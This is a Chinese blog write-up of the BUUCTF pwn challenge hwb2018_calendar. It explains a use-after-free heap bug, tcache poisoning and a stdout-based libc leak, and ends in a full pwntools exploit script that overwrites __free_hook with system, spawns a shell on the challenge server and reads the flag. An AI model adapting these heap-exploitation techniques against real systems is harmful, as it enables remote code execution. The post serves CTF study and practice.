[BUUCTF-pwn] hwb2018_calendar

最新推荐文章于 2024-07-04 23:57:36 发布
最新推荐文章于 2024-07-04 23:57:36 发布
阅读量321 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122785032
版权

我讨厌爆破,还是两次 堆地址+_IO_2_1_stdout_

题目给了一个很明显的UAF

void m3free()
{
  int v0; // [rsp+Ch] [rbp-4h]

  v0 = readid();
  if ( v0 != -1 )
    free((void *)qword_202060[v0]);
}

但是也有些限制,一是大小最大0x68,二是活动块只能建4个(这个无所谓,有俩用的就行)

另外edit里一个读入的函数有点坑,读入n+1个字符,n还不能为0,最少2个。这样改堆地址就比较麻烦,需要爆破半字节。

没有show不回显,得爆破libc地址,也是半字节。这样加起来就得爆很长时间。

主要思路:

  1. 先建两个块,在第1个块里造fake(一个可以释放到unsort的大小)。利用UAF将块建到fake位置,然后释放得到libc(没显示)
  2. 利用这个位置的指向main_arena的指针修改后两字节为?760(爆破半字节)指向_IO_2_1_stdout_,修改这里得到libc地址。
  3. 然后就没啥了,UAF将system写到__free_hook,然后将带/bin/sh的块释放即可。

解题代码:

from pwn import *

elf = ELF('./pwn')
context.arch = 'amd64'

def connect():
    global p,libc_elf,one,libc_start_main_ret,local
    
    local = 0
    if local == 1:
        p = process('./pwn')
    else:
        p = remote('node4.buuoj.cn', 26445) 
    libc_elf = ELF('../buuoj_2.27_amd64/libc-2.27.so')
    one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]
    libc_start_main_ret = 0x21b97

menu = b"choice> "
def add(idx, size):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"choice> ", str(idx).encode()) #1-4
    p.sendlineafter(b"size> ", str(size).encode())

def free(idx):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b"choice> ", str(idx).encode())

def edit(idx, size, msg):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b"choice> ", str(idx).encode())
    p.sendlineafter(b"size> ", str(size).encode())
    p.sendafter(b"info> ", msg)
    
def pwn():
    context.log_level = 'critical' #'debug'
    p.sendlineafter(b'input calendar name> ', b'AAAA')

    add(1, 0x38)
    add(2, 0x68)
    add(3, 0x18)
    add(4, 0x18)
    
    free(2)
    free(2)
    edit(1, 0x10, p64(0)+p64(0x71)+b'\n')
    #gdb.attach(p)
    #pause()
    #lh = int(input('stack=?2:'), 16)
    lh = 8
    edit(2, 1, b'\x70'+ p8(lh*16+2))
    add(2, 0x68)
    add(2, 0x68)
    free(2) #tcache 0x71
    edit(1, 0x10, p64(0)+p64(0xa1)+b'\n')
    [free(2) for _ in range(8)]
    
    #lh = int(input('stdout=?760:'), 16)
    lh = 8
    edit(2, 1, b'\x60'+p8(lh*16+7)) #?760
    add(2, 0x68)
    add(2, 0x68)
    #context.log_level = 'debug' #'critical' #'debug'
    edit(2, 4*8, p64(0xfbad1887)+p64(0)*3+p8(0x58))
    libc_base = u64(p.recv(8)) - libc_elf.sym['_IO_file_jumps']
    libc_elf.address = libc_base
    one_gadget= libc_base + one[0]
    print('libc:', hex(libc_base))
    
    if p64(libc_base)[5] != 0x7f and p64(libc_base)[5] != 0x7e:
        raise('no')
    
    free(3)
    free(3)
    edit(3, 7, p64(libc_elf.sym['__free_hook']))
    add(3, 0x18)
    add(3, 0x18)
    edit(3, 7, p64(libc_elf.sym['system']))
    edit(4, 7, b'/bin/sh\n')
    free(4)
    p.sendline(b'cat /flag')
    p.interactive()

while True:
    try:
        connect()
        pwn()
    except KeyboardInterrupt as e:
        exit()
    except:
        p.close()

石氏是时试
关注
专栏目录
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 459
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1011
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF pwn hwb2018_gettingstart
stareforever的博客
02-01 701
查看程序保护 IDA打开查看程序流 读入buf的内容会覆盖v7和v8的值,那么控制v7=0x7FFFFFFFFFFFFFFF和v8=0.1,即可获得shell 这里v8的二进制值可以直接在程序里找到 或者在网站http://www.binaryconvert.com/convert_double.html 输入0.1也可获得 完整ex from pwn import * context(log_level='debug') #io=process("./task_gettingStart_kt
BUUCTF 每日打卡 2021-4-22
weixin_52446095的博客
04-22 346
引言 无 浪里淘沙 题目描述: 附件内容: 一脸懵逼 答案见 wp[doge] Vigenère 维吉尼亚密码 不管,直接爆破 答案: 这是什么觅???? 扫了二维码,什么都没发现 附件没有后缀 用 010editor 打开 发现是 zip 文件 后缀名改为 .zip 内容是一张图片 右下角的数字和字母容易猜测代表 分别代表日历中的列和行 得到的日期,对应字母表中的字母 结果为 calendar 结语 希望继续坚持 ...
[BUUCTF-pwn] 护网杯_2018_task_calendar
weixin_52640415的博客
01-18 426
劫持_IO_2_1_stdout_ 程序没有show,需要劫持_IO_2_1_stdout_ 程序有add,edit,free其中edit调用sub_B5F 会多读1个字符:off_by_one,由于有大小限制,通过这里释放得到unsortbin __int64 __fastcall readstr_1(__int64 a1, signed int a2) { char buf; // [rsp+13h] [rbp-Dh] BYREF unsigned int i; // [rsp+14h]
[BUUCTF-pwn] t3sec2018_xueba
weixin_52640415的博客
01-24 467
数据结构:name:0x10,flag:8(1/0),content_ptr:8 在读入name时有个溢出,name长度是16但可以读21,不过这个长度覆盖不到指针。 puts("Input your note name and note content:"); sub_AD6((char *)&unk_202060 + 32 * i, 21LL); // 溢出 sub_AD6(qword_202078[4 * i], v1); ++dword_202050; free里没
CTF常见加密方式汇总
dfdhxb995397的博客
12-19 1741
1.栅栏密码 在IDF训练营里做过一道关于栅栏密码的问题。 栅栏密码的解法很简单,也有点复杂,字符长度因数多得会有很多个密码。对,栅栏密码的解法就是:计算该字符串是否为合数,若为合数,则求出该合数除本身和1的因数,然后将字符串分隔。用笔者自己写的解法就是这样: 凯撒密码,古代凯撒大帝用来打仗时的密码。凯撒密码在外界也有很多种解法。这里我用在国外CTF平台WeChall一道凯...
BUUCTF-PWN】4-ciscn_2019_n_1
燕麦葡萄干的博客
07-04 397
这里为了堆栈平衡+1反而没办法打通,不+1反而可以成功,因此后面做题的时候加不加1都试一下。需要v1变量溢出到v2,然后给v2 11.28125的值。查看变量在栈中的位置:v1 0x30 v2 0x04。11.28125的十六进制值是0x41348000。checksec检查是64位,开启了NX保护。这里再试验第二种思路,溢出到变量2。后门函数的地址是0x4006BE。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4104
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
CTF领域指南
Terminal Cloud
06-26 6871
原文:https://trailofbits.github.io/ctf/ 翻译:做个好人 译者声明:本文翻译自美国trailofbits团队发布在Github上的《CTF Field Guide》手册,我们已与对方联系获得翻译授权,由于手册内容尚在更新过程中,故有部分缺失。如有翻译不当之处,请与我们联系更正:@IDF实验室。 “Knowing is not enough;
hgame-2018 CTFwp(杭电信安)week3
苟有恒,必有三更眠,五更起。
03-04 1466
送分的sqli这题没有任何过滤什么的,真的是很简单了。 1 and 1=-1 union select 1,schema_name from information_schema.schemata查看库名,得:1 information_schema 1 test 1 week3_sqliiii2?id=1 and 1=-1 union select 1,table_name f
基于Matlab面板版的卡尔曼小球运动跟踪[Matlab面板版].zip
10-16
大模型实战教程
Day01(1).py
10-16
Day01(1).py
面试-PHP高频面试题整理-面试题合集.zip
10-16
面试_PHP高频面试题整理_面试题合集
(最新整理)中国企业OFDI微观数据2005-2022年
最新发布
10-16
1、资源内容地址:https://blog.csdn.net/2301_79696294/article/details/142994315 2、代码特点:今年全新,手工精心整理,放心引用,数据来自权威,相对于其他人的控制变量数据准确很多,适合写论文做实证用 ,不会出现数据造假问题 3、适用对象:大学生,本科生,研究生小白可用,容易上手!!! 3、课程引用: 经济学,地理学,城市规划与城市研究,公共政策与管理,社会学,商业与管理
毕业设计论文SpringBoot+Vue茶叶销售系统.docx
10-16
毕业设计论文
用于计算贴片天线的基本参数matlab代码.rar
10-16
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值